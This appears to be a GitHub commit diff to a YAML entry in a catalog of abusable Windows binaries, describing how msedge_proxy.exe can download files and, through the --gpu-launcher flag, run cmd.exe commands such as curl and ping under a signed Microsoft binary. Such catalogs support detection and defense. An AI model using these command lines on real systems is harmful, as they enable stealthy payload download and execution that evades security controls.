Update msedge_proxy.yml

This commit is contained in:
Mert Daş 2023-09-03 22:17:14 +03:00 committed by GitHub
parent 994aa792f0
commit f8743a4109
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -4,21 +4,21 @@ Description: Microsoft edge Browser
Author: 'Mert Daş'
Created: 2023-08-18
Commands:
- Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" http://example.com/test.zip
- Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" http://example.com/test.zip
Description: msedge_proxy will download malicious file.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&"
- Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&"
Description: Edge will silently download the file.
Usecase: Download file from the internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
- Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\system32\\cmd.exe /c ping google.com &&"
Description: msedge_proxy.exe will execute file in the background
Usecase: Executes a process under a trusted Microsoft signed binary
Category: Execute